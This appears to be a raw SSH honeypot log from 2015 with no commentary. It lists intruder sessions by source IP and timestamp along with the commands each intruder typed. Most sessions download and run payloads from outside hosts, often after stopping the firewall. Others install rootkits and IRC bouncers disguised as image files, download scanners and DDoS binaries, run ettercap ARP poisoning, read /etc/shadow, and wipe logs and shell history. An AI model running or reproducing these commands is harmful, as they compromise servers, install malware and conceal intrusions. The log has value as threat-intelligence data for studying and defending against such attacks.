ls /
Vi network.pl
Ee network.pl
cat

From 91.81.221.205  8-May-2015 19:23:01 ssh2 root
cat /proc/cpuinfo
cat /root/network.pl
cat network.pl
cat /reglas.pl
ls
ifconfig

From 43.229.52.143  9-May-2015 00:16:05 ssh2 root
ls
cd vmware
ls
lshw
ls hw
wget
Perl -v
curl
php
php -v
perl
python
yum
apt-get update
Yum update
apt-get install update
cat /etc/debian
apt-get install perl
Perl -v
apt-get install debian
/bin/sh/perl -v
cd
cd /
ls
cat /etc/debian_version
/bin/sh/ls

From 91.81.221.205  9-May-2015 05:09:09 ssh2 root
Chmod -r 777 /

From 91.81.221.205  9-May-2015 10:02:13 ssh2 root
apt-get install ftp

From 91.81.221.205  9-May-2015 14:55:17 ssh2 root
cat /etc/inetd.conf
reboot
restart
reboot
shutdown -r now
passwd
ps x
halt -r
/bin/ssh
cd /bin/ssh
ls
nano test.pl
edit
cat
cat test.pl
sudo
Kill -9 22244
sudo nano test.pl
/ssh
/sh
sh
/h
start
rebut
usr
cat .bash_history
cat lan.doc
apt-get install nano
nano
sudo aptget install update
passwd bash

From 5.90.3.116  9-May-2015 19:48:21 ssh2 root
ps aux
recovery
reload
/usr/bin/
cd /usr/bin/
sudo
Su root
ls
Mail
pwt
cd /
pwd
cd etc
pwd
ls
pwd
perl
sh
reboot

From 91.81.221.205 10-May-2015 00:41:25 ssh2 root
passwd
adimsh
admin

From 91.81.221.205 10-May-2015 05:34:29 ssh2 root
netstat
ftp
open

From 91.81.221.221 10-May-2015 15:20:37 ssh2 root
tar
tar zxvf
unzip

From 208.73.200.133 10-May-2015 17:56:29 ssh2 root
Exec wget -c http://66.117.9.14:81/59&&chmod 777 59
wget -c http://66.117.9.14:81/59&&chmod 777 59

From 107.189.144.54 10-May-2015 20:13:41 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a08.zip
chmod +x a08.zip
./a08.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip

From 184.164.71.105 11-May-2015 10:52:53 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip

From 78.134.12.223 11-May-2015 20:39:01 ssh2 root
w
ifconfig
cat /proc/cpuinfo
history
passwd
passwrd
/passwd
mkdir .,.
cd /var/tmp
ls -a
uname -a
cd /var
wget http://commentteam.ucoz.com/scan.tgz
cd
wget http://commentteam.ucoz.com/scan.tgz

From 208.73.200.133 12-May-2015 00:53:35 ssh2 root
Exec wget -c http://66.117.9.14:81/76&&chmod 777 76
wget -c http://66.117.9.14:81/76&&chmod 777 76

From 222.186.34.83 13-May-2015 01:57:25 ssh2 root
Exec chmod 0755 /usr/bin/chattr
chmod 0755 /usr/bin/chattr
Exec chmod 0755 /usr/bin/chattr
chmod 0755 /usr/bin/chattr

From 208.73.200.133 13-May-2015 07:50:41 ssh2 root
Exec wget -c http://66.117.9.14:81/49&&chmod 777 49
wget -c http://66.117.9.14:81/49&&chmod 777 49

From 212.71.202.45 13-May-2015 16:36:37 ssh2 root
w
uname -a
ps x
ls -a
cat /proc/cpuinfo
ls -a

From 148.163.43.179 14-May-2015 02:22:45 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip

From 104.223.11.112 14-May-2015 12:08:53 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip

From 212.71.202.45 14-May-2015 17:01:57 ssh2 root
w
uname -a
cat /proc/cpuifno
cat /proc/cpuinfo
set +o history
ls -a
uname -a
wget http://piratteam.hi2.ro/TOOLS/bnc/psy-autologin-autorun.jpg

From 89.2.164.123 14-May-2015 21:55:01 ssh2 root
cd /var/tmp
ls -a
cat /proc/cpuinfo
perl

From 148.163.43.179 15-May-2015 02:48:05 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a08.zip
chmod +x a08.zip
./a08.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a08.zip
chmod +x a08.zip
./a08.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip

From 157.7.152.200 15-May-2015 07:41:09 ssh2 root
Exec wget -c http://148.163.29.85/i/a08.zip&&chmod 777 a08.zip
wget -c http://148.163.29.85/i/a08.zip&&chmod 777 a08.zip

From 184.164.71.105 15-May-2015 12:34:13 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a07.zip
chmod +x a07.zip
./a07.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a07.zip chmod +x a07.zip ./a07.zip

From 104.149.245.120 15-May-2015 17:27:17 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a09
chmod +x a09
./a09
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a09 chmod +x a09 ./a09

From 208.73.200.133 15-May-2015 21:44:53 ssh2 root
Exec wget -c http://66.117.9.14:81/79&&chmod 777 79
wget -c http://66.117.9.14:81/79&&chmod 777 79

From 162.220.24.146 16-May-2015 17:52:37 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.17.37/i/a07.zip
chmod +x a07.zip
./a07.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.17.37/i/a07.zip
chmod +x a07.zip
./a07.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.17.37/i/a07.zip
chmod +x a07.zip
./a07.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip

From 107.182.141.40 16-May-2015 22:45:41 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.17.37/i/a08.zip
chmod +x a08.zip
./a08.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a08.zip chmod +x a08.zip ./a08.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.17.37/i/a08.zip
chmod +x a08.zip
./a08.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a08.zip chmod +x a08.zip ./a08.zip

From 104.149.245.120 17-May-2015 03:38:45 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.17.37/i/a06.zip
chmod +x a06.zip
./a06.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a06.zip chmod +x a06.zip ./a06.zip

From 188.138.17.15 17-May-2015 23:11:01 ssh2 root
export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
pwd
unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
pwd ls -a id
w
uptime
ls -al

From 78.134.89.155 18-May-2015 08:57:09 ssh2 root
uname -a
uptime
ifconfig
cat /proc/cpuinfo
ls -a
history
passwd
mkdir
mkdir .,.
wget http://gblmkd.web44.net/.com/bssh-new.tgz

From 91.81.221.162 18-May-2015 18:43:17 ssh2 root
cd
ls

From 78.134.89.155 19-May-2015 04:29:25 ssh2 root
w
whoami
ls -all
rm -rf .ssh
history
ifconfig
cat /proc/cpuinfo
ls -a
ps x
ifconfig
mkdir .,.
cd /var
ls
cd Mail
ls
nano lan.doc
history -c
cd /var/tmp
ls
mkdir ...

From 195.154.151.28 19-May-2015 09:22:29 ssh2 root
history
ps x

From 195.154.151.28 19-May-2015 14:15:33 ssh2 root
wget http://rds.co/test/others/rk.jpg
tar zxvf rk.jpg
cd .sshd
chmod +x *
./setup 3274434672
wget http://Debar.ucoz.com/bnc.tgz
tar -zxvf bnc.tgz
rm -rf bnc.tgz
cd .bnc
./config x 4244
./fuck
./run

From 91.81.221.164 19-May-2015 19:08:37 ssh2 root
w
ls
ps x
unae
uname -a
w
ifconfig
ps x
cat /proc/cpuinfo
wget
history
wget
ps x

From 195.154.151.28 20-May-2015 00:01:41 ssh2 root
mkdir .,.
cd .,.
ls
nano network.pl
yum install nano
apt-get install
nano
wget database.do.am/scan/gosh.tgz
cd
ls
ps x
ls
cat network.pl
cat test.pl
ps x
hisory -c

From 31.6.36.235 20-May-2015 04:54:45 ssh2 root
ettercap
apt-get
apt-get install ettercap

From 195.154.151.28 20-May-2015 09:47:49 ssh2 root
ettercap -Tq -L dump -i eth0 -M ARP

From 78.134.89.155 20-May-2015 14:40:53 ssh2 root
w
uname -a
ifconfig
cat/proc/cpuinfo

From 78.134.89.155 20-May-2015 19:33:57 ssh2 root
cat /proc/cpuinfo
history
ps x
mkdir .,.
ls -a
rm -rf .ssh
passwd
password
sudo
su
sudo su
sudo -su
apt-get install wget
wget http://debar.ucoz.com/gosh.tgz.tar
cd 24572
ls
ls -all
cd
ls
ls -a
cd .user60.rdb
ls

From 78.134.14.121 21-May-2015 15:06:13 ssh2 root
w
ls -a
ifconfig
cat /proc/cpuinfo
mkdir .,.
wget http://debar.ucoz.com/gosh.tgz.tar
history

From 91.81.221.188 22-May-2015 00:52:21 ssh2 root
w
ps x
history
pwd
id
us
ifconfig

From 183.203.136.126 23-May-2015 01:17:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/132;chmod 777 132;./132;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.203.136.126:888/132
chmod 777 132
./132

From 183.203.136.126 23-May-2015 06:10:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/124;chmod 777 124;./124;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.203.136.126:888/124
chmod 777 124
./124

From 183.203.136.126 23-May-2015 11:03:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/126;chmod 777 126;./126;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.203.136.126:888/126
chmod 777 126
./126

From 216.170.120.156 23-May-2015 15:27:29 ssh2 root
Exec wget -c http://216.170.125.185/59&&chmod 777 59
wget -c http://216.170.125.185/59&&chmod 777 59

From 183.203.136.126 23-May-2015 15:56:53 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/131;chmod 777 131;./131;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.203.136.126:888/131
chmod 777 131
./131

From 183.203.136.126 23-May-2015 20:49:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/130;chmod 777 130;./130;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.203.136.126:888/130
chmod 777 130
./130

From 183.203.136.126 24-May-2015 01:43:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/8998;chmod 777 8998;./8998;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.203.136.126:888/8998
chmod 777 8998
./8998

From 31.6.35.28 24-May-2015 06:36:05 ssh2 root
ettercap
apt-get install ettercap
apt-get install ettercap-text-only
ettercap -Tq -L dump -i eth0 -M ARP
apt-get upgrade

From 107.160.59.29 24-May-2015 11:29:09 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://198.15.234.66/i/a07.zip
chmod +x a07.zip
./a07.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://198.15.234.66/i/a07.zip chmod +x a07.zip ./a07.zip

From 107.150.45.147 24-May-2015 22:24:35 ssh2 root
Exec ls ./
ls ./

From 43.255.189.11 25-May-2015 07:01:25 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://198.15.234.66/i/a06.zip
chmod +x a06.zip
./a06.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://198.15.234.66/i/a06.zip chmod +x a06.zip ./a06.zip

From 134.213.156.13 26-May-2015 12:19:49 ssh2 root
Exec hostname
hostname

From 198.15.131.169 26-May-2015 17:12:53 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://104.143.5.13/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.143.5.13/i/a09.zip chmod +x a09.zip ./a09.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://104.143.5.13/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.143.5.13/i/a09.zip chmod +x a09.zip ./a09.zip

From 88.147.37.170 27-May-2015 22:31:17 ssh2 root
w
ls -all
rm -rf .ssh
history
cat /proc/cpuinfo
ifconfig
mkdir .,.
cd /var/tmp
ls
mkdri .,.
mkdir .,.
uname -a
cd tmp
ls
cd
cd var
ls
wget http://commentteam.ucoz.com/bssh-new.tgz
history -c

From 108.84.73.123 28-May-2015 13:10:29 ssh2 root
ls
cd ..
ls
cd ..
ls
cd ns
ls
cd nsmail
ls
vim test.pl
vi test.pl
nano test.pl
gtk
hrlp
help
/?
?
tasklist
ps -A
cd /etc
ls

From 92.75.38.199 29-May-2015 13:35:49 ssh2 root
w
uname -a
ls -a
cd /dev/shm
ls -a
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

From 43.229.53.49 29-May-2015 18:28:53 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08

From 43.229.53.67 29-May-2015 23:21:57 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08

From 43.229.53.66 30-May-2015 04:15:01 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08

#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08

From 172.158.5.24 30-May-2015 14:01:09 ssh2 root
tar
wget
ks
ls
uname -a
cat /proc/cpuinfo

From 65.111.181.5 30-May-2015 18:54:13 ssh2 root
w
uname -a
ps x
cat /proc/cpuinfo
cat /etc/issue
cat /proc/cpuinfo
ps x
perl
apt-get
apt-get install perl
cd /tmp
mkdir .". ."
cd .". ."
mkdir ." "
cd ." "
wget f0rever.host.sk/blk/byu
perl byu
wget
tar
wget ftp://temp:muie1332@220.128.70.85/php.txt
perl php.txt
exit

From 178.7.114.244 31-May-2015 14:26:29 ssh2 root
w
uname -a
cat /proc/cpuinfo
cd /home
ls -a
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

From 120.27.54.108 31-May-2015 19:19:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://120.27.54.108:2554/ddos1;chmod 777 ddos1;./ddos1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://120.27.54.108:2554/ddos1
chmod 777 ddos1
./ddos1

From 178.7.114.244  1-Jun-2015 00:12:37 ssh2 root
w
uname -a
cat /proc/cpuinfo
ls -a
cd /dev/shm
ls -a

From 178.7.114.244  1-Jun-2015 05:05:41 ssh2 root
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
history -c -d offset

From 216.170.120.156  1-Jun-2015 16:07:11 ssh2 root
Exec wget -c http://216.170.125.185/79&&chmod 777 79
wget -c http://216.170.125.185/79&&chmod 777 79

From 104.207.134.245  2-Jun-2015 10:10:29 ssh2 root
cat .bash_history
cd --
pwd
cd /root
ls -a
cat .bash_history
locate .bash_history
find / |grep .bash_history

From 176.10.99.208  2-Jun-2015 10:24:05 ssh2 root
w
export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
pwd
gcc
ls -a
id
uname -a
hoami
cat /etc/passwd
ls -a
whoami
wget pwd
pwd
df -h
cd /run/shm
ls -a /media
ls -a /video
who
whoami
apt-get install gcc make automake
pwd ls -a whoami
pwd
ls -a
nano test.pl
ls -al
wget

From 104.207.134.245  2-Jun-2015 15:17:09 ssh2 root
cat .bash_history
pwd
cd /root
ls -a
cat .bash_history
locate .bash_history
find / |grep .bash_history

From 109.74.10.91  3-Jun-2015 01:03:17 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE
w
ifconfig
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export
last
ps -ef
w
ps -e
df -h
ifconfig
exit

From 31.6.45.212  3-Jun-2015 05:56:21 ssh2 root
mail
apt-get
apt-get install mailutils
apt-get install mailutils install mailutils mailutilsastlog install mailutils
mail

From 216.170.125.156  3-Jun-2015 09:23:19 ssh2 root
Exec wget -c http://216.170.125.185/76&&chmod 777 76
wget -c http://216.170.125.185/76&&chmod 777 76

From 216.170.120.156  3-Jun-2015 19:42:21 ssh2 root
Exec wget -c http://216.170.125.185/49&&chmod 777 49
wget -c http://216.170.125.185/49&&chmod 777 49
Exec wget -c http://216.170.125.185/49&&chmod 777 49
wget -c http://216.170.125.185/49&&chmod 777 49

From 222.186.21.201  3-Jun-2015 20:35:33 ssh2 root
Exec chmod 0755 /usr/bin/chattr
chmod 0755 /usr/bin/chattr

From 103.40.102.76  5-Jun-2015 01:53:57 ssh2 root
wget http://192.184.39.67:1818/facai2015 chmod +x facai2015 ./facai2015 chattr +i
ps -ef

From 78.191.194.64  5-Jun-2015 06:47:01 ssh2 root
history
ls

From 89.136.65.218  5-Jun-2015 11:40:05 ssh2 root
w
uname -a
ifconfig
ls -a
.bash_history
rm -rf .bash_history
cat /etc/passwd
passwd
cat /etc/issue
cat /proc/cpuinfo

From 216.170.120.156  5-Jun-2015 12:58:29 ssh2 root
Exec wget -c http://216.170.125.185/49&&chmod 777 49
wget -c http://216.170.125.185/49&&chmod 777 49

From 89.136.65.218  5-Jun-2015 16:33:09 ssh2 root
w
ls -a
history -c
cd /dev/shm
ls -a
wget http://coxspeed.webs.com/psybnc-linuxRO.tgz

From 188.241.34.13  5-Jun-2015 21:26:13 ssh2 root
w
wget
uname -a
cd /tmp
mkdir ...
cd ...
pwd
ls
cd /dev/shm
ls

From 75.148.0.149  6-Jun-2015 02:19:17 ssh2 root
ls
ls -a

From 75.148.0.149  6-Jun-2015 07:12:21 ssh2 root
cd ssh
ls
wget ftp://188.120.225.162/scan.tgz
y
ls
wget ftp://188.120.225.162/scan.tgz
c
wget ftp://qwe@qwe:188.120.225.162/scan.tgz
c

From 192.99.83.237  6-Jun-2015 12:05:25 ssh2 root
la
ls -a

From 75.148.0.149  6-Jun-2015 16:58:29 ssh2 root
wget cargo-globe.com/scan.tgz
c
wget
http://cargo-globe.com/scan.tgz
httwget arg
wget http://cargo-globe.com/scan.tgz
-c
-o
cd
wget
-c
apt-get install wget
wgetr
wget
http://cargo-globe.com/scan.tgz
htt
wget http://cargo-globe.com/scan.tgz
-o
-c
wget http://cargo-globe.com/scan.tgz
-y
cd
ls
ls -a
cd root
wget
Y
P
apt-get install wget
apt-get install zmap
cd zmap
ls
ls -a
cd
cd ssh
ls
wget
cat /etc/shadow
/sbin /ifconfig
cd
/sbin /ifconfig | grep inet
sudo apt-get install openssh-server
gunzip
ifconfig
gksu nautilus
wget
c
-0
-o
o
O
Y
P
U
ls
ls -a
ls -i
cd
cd/
/cd
ls
cd cpan
ls
ls -a
cd
a
das
wget install
sudo
sudo apt-get install wget
apt-get install wget
df -h
cat /etc/shadow
Free
free
ftp
ls /usr/bin
cd mbox
ls
cd
netstat
sudo /etc/init.d/ssh restart
ls -al
find
nslookup venus
wget -r -l
s
wget -c
wget-c

From 90.193.250.74  6-Jun-2015 21:51:33 ssh2 root
w
uname -a
ls -al
cat .bash_history
cd /dev/shm
ls -al
pwd
ls
wget canim.home.ro/autopsy.tgz
tar zxvf autopsy.tgz
rm -rf autopsy.tgz
cd .bash
./autorun
./start x
wget canim.home.ro/autopsy.tgz
ls

From 90.193.250.74  7-Jun-2015 02:44:37 ssh2 root
pwd
dir
cd ..
rm -rf .bash

From 216.170.125.155  7-Jun-2015 06:14:37 ssh2 root
Exec wget -c http://104.156.238.159/59&&chmod 777 59
wget -c http://104.156.238.159/59&&chmod 777 59
Exec wget -c http://104.156.238.159/59&&chmod 777 59
wget -c http://104.156.238.159/59&&chmod 777 59

From 90.193.250.74  7-Jun-2015 07:37:41 ssh2 root
curl -0 http://canim.home.ro/autopsy.tgz
lwp-download http://canim.home.ro/autopsy.tgz
wget
id
/etc/sbin/adduser news
cd /etc/sbin
ls
perl
yum install perl
gcc
fetch

From 89.122.230.153  7-Jun-2015 17:23:49 ssh2 root
/dns 167.114.3.141

From 107.150.45.147  8-Jun-2015 13:11:43 ssh2 root
Exec wget -P/root/ http://107.150.178:88/disk
wget -P/root/ http://107.150.178:88/disk

From 78.191.200.147  8-Jun-2015 22:42:13 ssh2 root
